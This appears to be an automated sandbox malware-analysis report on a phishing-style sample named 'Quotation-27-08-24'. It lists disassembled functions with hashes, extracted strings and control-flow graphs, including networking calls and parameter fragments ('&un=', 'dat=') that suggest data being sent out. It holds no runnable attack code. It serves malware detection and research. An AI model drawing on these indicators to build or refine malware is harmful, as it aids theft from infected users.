                                          • Opcode ID: 0fcf3752f4ff0e25dc00e34b5be4f40b32f38ff33f99641814b36236cf543c1b
                                          • Instruction ID: 0286aa9050236803d31bd3cca98d88b9961945533b33a04bdefa6d1be1f55ba1
                                          • Opcode Fuzzy Hash: 0fcf3752f4ff0e25dc00e34b5be4f40b32f38ff33f99641814b36236cf543c1b
                                          • Instruction Fuzzy Hash: DC510771A00645AFCB74DF9CCC9097FBBF8EB44300B648459F5D6C768AEA78DA409B60
                                          Function 00F97630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                          Download Yara Rule
                                          Strings
                                          • ExecuteOptions, xrefs: 00FD46A0
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FD4725
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FD4742
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FD4655
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FD4787
                                          • Execute=1, xrefs: 00FD4713
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FD46FC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                          • API String ID: 0-484625025
                                          • Opcode ID: ab97d4c6c94f7a01421202db1b15c9ff36be23593bfec874b89ab8b0214d7fd4
                                          • Instruction ID: a689f2348019e631bbcbb7b0cc9dd7603a268c2102e1fda78404c12e28d513cc
                                          • Opcode Fuzzy Hash: ab97d4c6c94f7a01421202db1b15c9ff36be23593bfec874b89ab8b0214d7fd4
                                          • Instruction Fuzzy Hash: 8D514931A043197BEF20BFA4DC86FEE77A8AF44310F1400A9E605A7191E771AE45EF51
                                          Function 00FAB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-$0$0
                                          • API String ID: 1302938615-699404926
                                          • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction ID: 73e290a40378be5447d71d64f0b9dbc911f088fb043a8606f1571a76f639ac16
                                          • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                          • Instruction Fuzzy Hash: 028191B0E052499EDF24CF68C8517FEBBB5AF87320F184259E861A7393C7749841EB50
                                          Function 010120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$[$]:%u
                                          • API String ID: 48624451-2819853543
                                          • Opcode ID: 502dbb570c4c01dc57c71fea00580bdc107f29bb0355c9b270a1edd31536c035
                                          • Instruction ID: 0161f472e83cb0577c6f8da49ca87f0f72cf8043ba7bd24220bf485fb8808f27
                                          • Opcode Fuzzy Hash: 502dbb570c4c01dc57c71fea00580bdc107f29bb0355c9b270a1edd31536c035
                                          • Instruction Fuzzy Hash: 9921A3BAE00119ABDB10DF69CC40AEEBBE8EF58744F140156EA44E3205EB34DA019BA1
                                          Function 00F8F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FD02E7
                                          • RTL: Re-Waiting, xrefs: 00FD031E
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FD02BD
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                          • API String ID: 0-2474120054
                                          • Opcode ID: a916b450f2e4f0c3a98f54e5c2b1d92803c23223ad1bfa4d36b27cff2388e597
                                          • Instruction ID: c733cb2562bd7c77fc060661244c083fe3774ac7b634fd3abc3e671d917cbf32
                                          • Opcode Fuzzy Hash: a916b450f2e4f0c3a98f54e5c2b1d92803c23223ad1bfa4d36b27cff2388e597
                                          • Instruction Fuzzy Hash: 59E1E231A047419FD725DF28C885B6AB7E1BF84324F240A2EF4A58B3D1DB74D848EB52
                                          Function 00F9BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FD7B7F
                                          • RTL: Re-Waiting, xrefs: 00FD7BAC
                                          • RTL: Resource at %p, xrefs: 00FD7B8E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 0-871070163
                                          • Opcode ID: 9e1485050e3951eb234f46f6f013fc3972694fe1b56c75c4bd79e4d0d4d054d1
                                          • Instruction ID: 3553ca676f17e3016472719a22156549a965037eb54f4347aab465c372093e15
                                          • Opcode Fuzzy Hash: 9e1485050e3951eb234f46f6f013fc3972694fe1b56c75c4bd79e4d0d4d054d1
                                          • Instruction Fuzzy Hash: 644116317047029FDB20DE25DD41B6AB7E5EF88724F100A1EF956DB380DB71E805AB91
                                          Function 00F9B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD728C
                                          Strings
                                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FD7294
                                          • RTL: Re-Waiting, xrefs: 00FD72C1
                                          • RTL: Resource at %p, xrefs: 00FD72A3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-605551621
                                          • Opcode ID: 1d7d56d38a81bdc978e2104bf8a1b2414e87588921796fff123b6ebe4d14abdc
                                          • Instruction ID: d87ce0fd6a6ef30ad8f8114c3573e0ccc708aac0281be7251dbb8eebee7f509e
                                          • Opcode Fuzzy Hash: 1d7d56d38a81bdc978e2104bf8a1b2414e87588921796fff123b6ebe4d14abdc
                                          • Instruction Fuzzy Hash: FE410731B04352ABDB21EE25CC42B6AB7A5FF84721F140619F955DB381EB21E806BBD1
                                          Function 01012300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: %%%u$]:%u
                                          • API String ID: 48624451-3050659472
                                          • Opcode ID: 78093e83a9be9b0211f0c0e93602a836f6ca4d6e4c00be9d7bb79dbd3e5a1cec
                                          • Instruction ID: e5bf4c15f6efd8aa5a7a1e46f30e3d91d63aee21e53b67b55a7555401c1ef4f1
                                          • Opcode Fuzzy Hash: 78093e83a9be9b0211f0c0e93602a836f6ca4d6e4c00be9d7bb79dbd3e5a1cec
                                          • Instruction Fuzzy Hash: 7331A472A002199FDB60DE2DCC41BEFB7F8EB44750F544495E989E3245EB34EA449FA0
                                          Function 00FA7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: __aulldvrm
                                          • String ID: +$-
                                          • API String ID: 1302938615-2137968064
                                          • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction ID: b153eeff31029cae7041e2ac3ae373f58d318e6d34dd55b0a1302ec4c147c388
                                          • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                          • Instruction Fuzzy Hash: E891B4F1E083059EDF24EF69CC81EBEB7A5AF46330F24451AE855A72C0D7749E41A760
                                          Function 00F69126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $$@
                                          • API String ID: 0-1194432280
                                          • Opcode ID: 1e1c5eb65dde115b9f938869ee713bd682fc9949ec0657d1945245c7faecbf20
                                          • Instruction ID: 44f0010227c5e16b3cdd7fa9a28ba8308bd629b87d73867827e808774fd8a774
                                          • Opcode Fuzzy Hash: 1e1c5eb65dde115b9f938869ee713bd682fc9949ec0657d1945245c7faecbf20
                                          • Instruction Fuzzy Hash: 0E814C71D002699BDB31CB54CD45BEEB7B8EF48710F1041EAA909B7280E7745E84EFA0
                                          Function 00FECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                          Download Yara Rule
                                          APIs
                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00FECFBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: CallFilterFunc@8
                                          • String ID: @$@4Cw@4Cw
                                          • API String ID: 4062629308-3101775584
                                          • Opcode ID: 5873edc847e573e46fb6b37c6be0e8ea2a0c9d2954c7d3b8252da8191aa48bb1
                                          • Instruction ID: 8015404fbf7384d11ce7ac09b2cb38ad15a3598ab6ad7b79318aa1e0112d8b18
                                          • Opcode Fuzzy Hash: 5873edc847e573e46fb6b37c6be0e8ea2a0c9d2954c7d3b8252da8191aa48bb1
                                          • Instruction Fuzzy Hash: CB41BFB1D00258DFCB219FAACC41AAEBBB8FF44B10F14402AFA44DB255D739D901EB61

                                          Execution Graph

                                          Execution Coverage:3.6%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:36
                                          Total number of Limit Nodes:5
                                          execution_graph 20130 5814183 20131 5814187 20130->20131 20132 58140c1 20130->20132 20135 58368c9 20132->20135 20139 58131c9 20132->20139 20136 583692a 20135->20136 20138 5836937 20136->20138 20143 5813099 20136->20143 20138->20132 20141 58131e2 20139->20141 20142 581327a 20139->20142 20140 5836829 2 API calls 20140->20142 20141->20140 20142->20132 20145 58130e0 20143->20145 20144 581315a 20144->20138 20144->20144 20145->20144 20147 5836829 20145->20147 20148 583688a 20147->20148 20150 58368a7 20148->20150 20151 58148e9 20148->20151 20150->20145 20153 5814934 20151->20153 20152 5814b20 20152->20150 20153->20152 20154 5814e14 20153->20154 20161 5814cac 20153->20161 20155 58385c9 closesocket 20154->20155 20156 5814e2e 20155->20156 20156->20150 20157 5814da8 20158 58385c9 closesocket 20157->20158 20159 5814dc2 20158->20159 20159->20150 20160 5814fb8 20162 58385c9 closesocket 20160->20162 20161->20157 20168 5814e56 20161->20168 20163 5814ff4 20162->20163 20163->20150 20165 5814ef9 20166 5815088 setsockopt 20165->20166 20167 5814f97 20165->20167 20166->20167 20169 58385c9 20167->20169 20168->20160 20168->20165 20170 58385e3 20169->20170 20171 58385f2 closesocket 20170->20171 20171->20152

                                          Executed Functions

                                          Function 02997B50 Relevance: .1, Instructions: 114COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bda7af8d41122e6b4b7f7e2644bd3e2235ae153d8c58e2f6311c2cf729e5a9c0
                                          • Instruction ID: 53015e952e29ed06771813dcfff2aba1c709762f5699d1926cbaf0fc935b3224
                                          • Opcode Fuzzy Hash: bda7af8d41122e6b4b7f7e2644bd3e2235ae153d8c58e2f6311c2cf729e5a9c0
                                          • Instruction Fuzzy Hash: D431B3516583F14ED31E836D08B9675AFC24E9720174EC2EEDADA5F3E3C4848409D3A1
                                          Function 05813820 Relevance: .0, Instructions: 50COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee7d16cd056295b428d59877c53c2cb8acf1f53bb2343198eb02d8d1c5e57462
                                          • Instruction ID: a94b7354cdb862014d6d2c5cf69126901079477655f4886e53742eef210800fc
                                          • Opcode Fuzzy Hash: ee7d16cd056295b428d59877c53c2cb8acf1f53bb2343198eb02d8d1c5e57462
                                          • Instruction Fuzzy Hash: C2014E76745300BAE32057685C4ABD5B7A89F41311F14045BF948DB1C1C9A5B84287EA
                                          Function 02997346 Relevance: 30.4, Strings: 24, Instructions: 371COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 2997346-29976c5 1 29976d6-29976e2 0->1 2 29976f9-2997703 1->2 3 29976e4-29976f7 1->3 5 2997714-299771b 2->5 3->1 6 299771d-2997744 5->6 7 2997746-299775e 5->7 6->5 9 299776f-2997778 7->9 10 299777a-2997783 9->10 11 2997790-299779a 9->11 12 299778e 10->12 13 2997785-2997788 10->13 14 29977ab-29977b4 11->14 12->9 13->12 16 29977ca 14->16 17 29977b6-29977c8 14->17 19 29977d4-29977dd 16->19 17->14 20 29979b3-29979bc 19->20 21 29977e3-29977ed 19->21 22 29979d8-29979e4 20->22 23 29979be-29979d6 20->23 24 29977fe-2997807 21->24 25 2997a03-2997a0c 22->25 26 29979e6-2997a01 22->26 23->20 27 2997809-299781b 24->27 28 299781d-2997826 24->28 30 2997a9f-2997aa9 25->30 31 2997a12-2997a1c 25->31 26->22 27->24 32 299782c-2997836 28->32 36 2997aba-2997ac6 30->36 33 2997a2d-2997a39 31->33 34 2997838-2997855 32->34 35 2997857-2997861 32->35 39 2997a3b-2997a4d 33->39 40 2997a4f-2997a59 33->40 34->32 41 2997872-299787b 35->41 37 2997ac8-2997ad4 36->37 38 2997ad6-2997ae0 36->38 37->36 43 2997af1-2997afb 38->43 39->33 45 2997a6a-2997a73 40->45 46 299788b-2997894 41->46 47 299787d-2997889 41->47 48 2997b49-2997b4f 43->48 49 2997afd-2997b47 43->49 51 2997a85 call 29b2186 45->51 52 2997a75-2997a7b 45->52 53 29978b0-29978b4 46->53 54 2997896-29978ae 46->54 47->41 49->43 64 2997a8a 51->64 56 2997a7d-2997a80 52->56 57 2997a83 52->57 58 29978d5-29978d9 53->58 59 29978b6-29978d3 53->59 54->46 56->57 61 2997a5b-2997a64 57->61 62 29978db-29978fa 58->62 63 29978fc-299790e 58->63 59->53 61->45 62->58 65 299791c-2997926 63->65 66 2997910-2997917 63->66 67 2997a8d-2997a9d 64->67 68 2997937-2997940 65->68 66->20 67->30 67->67 69 2997950-2997956 68->69 70 2997942-299794e 68->70 72 2997959-2997963 69->72 70->68 73 299799c-29979ac 72->73 74 2997965-2997980 72->74 73->73 77 29979ae 73->77 75 2997982-2997986 74->75 76 2997987-2997989 74->76 75->76 78 299798b-2997994 76->78 79 299799a 76->79 77->19 78->79 79->72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !b$,$,$53$?\$CD$E$N+$Q$R!$R{$W$^$eC$f$h+$l$l$lM$q$ze$~$~$1
                                          • API String ID: 0-1739146893
                                          • Opcode ID: f2721d4657ad889084e0db66cb1a93934d05ec3407a4c4e803d72b2373daeafd
                                          • Instruction ID: 4be910d92dfad501604bc4cd475ca2e6e1d560d30e5a0766baa88374ea98ea92
                                          • Opcode Fuzzy Hash: f2721d4657ad889084e0db66cb1a93934d05ec3407a4c4e803d72b2373daeafd
                                          • Instruction Fuzzy Hash: E7227AB0D15228CFEF24CF99C894BEDBBB2BB44318F1085D9D5096B281DBB55A89CF40
                                          Function 058148E9 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 668COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 80 58148e9-5814932 81 5814934-5814937 80->81 82 581494d-581494f 80->82 81->82 83 5814939-581493c 81->83 84 5814955-581495c 82->84 85 5815187-581518c 82->85 83->82 86 581493e-5814941 83->86 87 5814962-5814973 84->87 88 5815186 84->88 86->82 89 5814943-5814946 86->89 90 5814981-5814984 87->90 91 5814975-581497b 87->91 88->85 89->82 92 5814948-581494b 89->92 93 5814986-5814989 90->93 94 581498b 90->94 91->90 92->82 92->84 93->94 95 5814991-5814999 93->95 94->95 96 58149a9-58149ac 95->96 97 581499b-581499e 95->97 99 58149b4-58149cb 96->99 100 58149ae 96->100 98 58149a0-58149a7 97->98 97->99 98->100 101 58149d2-58149d9 call 5814539 99->101 102 58149cd-58149d0 99->102 100->99 105 58149de-58149fd 101->105 102->101 103 5814a03-5814a09 102->103 106 5814aa2-5814aaf 103->106 107 5814a0f-5814a15 103->107 105->88 105->103 106->88 108 5814ab5-5814abc 106->108 109 5814a40-5814a4f 107->109 110 5814a17-5814a3a call 58104c9 call 5830719 107->110 112 5814ad6-5814ae1 108->112 113 5814abe-5814acf call 5838479 108->113 109->88 111 5814a55-5814a59 109->111 110->109 111->88 115 5814a5f-5814a61 111->115 118 5814ae3-5814af8 call 5814669 112->118 119 5814b2e-5814b43 112->119 113->112 115->88 121 5814a67-5814a69 115->121 127 5814afd-5814b1e 118->127 122 5814b61-5814b64 119->122 123 5814b45-5814b5f call 5839fe9 119->123 121->88 128 5814a6f-5814a85 call 58145c9 121->128 122->88 130 5814b6a-5814b6d 122->130 136 5814b9d-5814ba2 call 5839fe9 123->136 127->119 131 5814b20-5814b2d 127->131 135 5814a8a-5814a8f 128->135 130->88 134 5814b73-5814b76 130->134 137 5814b78-5814b7b 134->137 138 5814b7d-5814b9c call 5839fe9 134->138 135->106 139 5814a91-5814a97 135->139 140 5814ba5-5814c59 call 5839fb9 call 5821fe9 call 5822ef9 * 2 call 5839fb9 call 58227f9 call 583a1b9 136->140 137->138 137->140 138->136 139->106 159 5814c76-5814c9d 140->159 160 5814c5b-5814c5e 140->160 162 5814ca3-5814ca6 159->162 163 5814dea-5814e0e call 5816269 159->163 160->159 161 5814c60-5814c73 call 5822cc9 160->161 161->159 162->163 166 5814cac-5814ccf 162->166 171 5814e14-5814e55 call 58385c9 163->171 172 5814d6c-5814d72 163->172 169 5814cd1 166->169 170 5814cd5-5814d69 call 583a2e9 * 3 call 583a1b9 * 2 call 5822ef9 * 2 166->170 169->170 170->172 175 5814fa3-5814fb6 call 583a1b9 172->175 176 5814d78-5814d7b 172->176 185 5814f44-5814f6e call 58100e9 call 58146f9 175->185 186 5814fb8 175->186 176->175 180 5814d81-5814da2 call 5816299 176->180 191 5814e56-5814ed3 call 583a1b9 call 5839fb9 call 583a1b9 call 58227f9 call 583a1b9 * 3 180->191 192 5814da8-5814de9 call 58385c9 180->192 210 5814f74-5814f89 185->210 211 581500f 185->211 189 5814fbd-581500e call 58100e9 call 5832719 call 58385c9 186->189 253 5814ed5-5814eec call 583a1b9 call 5839fb9 191->253 254 5814eef-5814ef3 191->254 210->211 214 5814f8f-5814f95 210->214 216 5815012-5815015 211->216 214->216 219 5814f97 214->219 221 5815017-581501a 216->221 222 5815028-5815045 216->222 232 5814f9e 219->232 227 5815141-5815156 call 58385c9 221->227 228 5815020-5815022 221->228 223 5815057-58150e9 call 5839fe9 call 5839fb9 setsockopt call 5814799 222->223 224 5815047-5815051 222->224 247 58150eb 223->247 248 581512d-581513b 223->248 224->223 224->227 235 581515b-581517c 227->235 228->222 228->227 232->227 235->88 247->248 250 58150ed-58150f2 247->250 248->227 250->248 252 58150f4-5815121 call 5814799 250->252 257 5815126-581512b 252->257 253->254 258 5814ef9-5814f06 254->258 259 5814fba 254->259 257->247 257->248 261 5814f26-5814f29 258->261 262 5814f08-5814f0e 258->262 259->189 264 5814f2e-5814f31 261->264 262->261 263 5814f10-5814f24 262->263 263->264 266 5814f41 264->266 267 5814f33-5814f39 264->267 266->185 267->266 269 5814f3b 267->269 269->266
                                          APIs
                                          • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 058150B6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: setsockopt
                                          • String ID: &br=9$&un=$80$dat=
                                          • API String ID: 3981526788-3709368510
                                          • Opcode ID: 5816a91d4c5ae5aad9ff0e861120210a4e10006d7c3255f4efa05dfbd32dbd6a
                                          • Instruction ID: 7dc63641dd7c1c2bc5c71b98dffab0257afd9a542093d85d6d9e543f06df38db
                                          • Opcode Fuzzy Hash: 5816a91d4c5ae5aad9ff0e861120210a4e10006d7c3255f4efa05dfbd32dbd6a
                                          • Instruction Fuzzy Hash: 4C42A1B1A04305AFDB24DFA8C884EEEB3B9EF44304F14856EED5AD7251E730A944CB95
                                          Function 029A4EB6 Relevance: 6.4, Strings: 5, Instructions: 153COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 6$S$\$s$ZPK
                                          • API String ID: 0-1238618981
                                          • Opcode ID: a025cb78f3ecfb636ef1180e8162f70fd6d0c5a15ccb261762b7497a3fc1a509
                                          • Instruction ID: 40aabd6aa33cb0aa9b2734cd8205b30f219e7e1a961505867a2794858345f01b
                                          • Opcode Fuzzy Hash: a025cb78f3ecfb636ef1180e8162f70fd6d0c5a15ccb261762b7497a3fc1a509
                                          • Instruction Fuzzy Hash: E95183B2D00219ABDB11EF94DD89BEEB3BDEF84714F0441A9E90D67100E7B15A048FE1
                                          Function 058385C9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 317 58385c9-5838600 call 5810559 call 58391c9 closesocket
                                          APIs
                                          • closesocket.WS2_32(0581515B,058368A7,?,?,0581515B,?,000000FF), ref: 058385FB
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4575428088.0000000005800000.00000040.80000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_5800000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: closesocket
                                          • String ID:
                                          • API String ID: 2781271927-0
                                          • Opcode ID: 382923b2ddc5e64463bb82babed39c85e58a14cb120f0261bcdc8cc6e96b3e32
                                          • Instruction ID: cbcdc30bb34e0aa4351ad69221757d2df9e2b420f330c24bd148a49c87ecb62b
                                          • Opcode Fuzzy Hash: 382923b2ddc5e64463bb82babed39c85e58a14cb120f0261bcdc8cc6e96b3e32
                                          • Instruction Fuzzy Hash: 31E04636200214BBD210AAAAEC04DDB776CDBC6210B014416FE08A7200DA74BE1087F5
                                          Function 029B2216 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 408 29b2216-29b2280 call 298e966 411 29b22b2-29b22b9 408->411 412 29b2282-29b228f call 29ae536 408->412 414 29b2294-29b22b1 call 298e7e6 412->414
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: ZPK
                                          • API String ID: 0-297889628
                                          • Opcode ID: 771ae4d058267aaec8ff42ff29729ea273fd69fc6ca17d0448b97ca3cd0e53bd
                                          • Instruction ID: ce23b8ac4c29b0793c9ab0440b92448c8595977a4685b348a619736aec146292
                                          • Opcode Fuzzy Hash: 771ae4d058267aaec8ff42ff29729ea273fd69fc6ca17d0448b97ca3cd0e53bd
                                          • Instruction Fuzzy Hash: 5021FEB6D01219AF8B50DFA9D8418EFB7F9EF88210F04456AE915E7200E7705A05CBE1
                                          Function 029B3556 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 417 29b3556-29b35bf call 298e966 420 29b35ed-29b35f4 417->420 421 29b35c1-29b35ca call 299d536 417->421 423 29b35cf-29b35ec call 298e7e6 421->423
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.4571780293.00000000026D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 026D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_26d0000_uExImirYECsTjI.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: Dy
                                          • API String ID: 0-4229255526
                                          • Opcode ID: bccec4aa01fe6b9e4c826bd2947f93411203c7381e84fc6bce816bb49727fe1f
                                          • Instruction ID: 9dc53a79385cfd57c36f8ceeb1d0b94bb58d26638f960fa3651e740c631f8983
                                          • Opcode Fuzzy Hash: bccec4aa01fe6b9e4c826bd2947f93411203c7381e84fc6bce816bb49727fe1f
                                          • Instruction Fuzzy Hash: 1D11EFB6D0121DAF9F04DFA9D9409EEB7F9EF88214F04426EE919E7200E7715A04CFA1
                                          Function 0299110B Relevance: .2, Instructions: 167COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
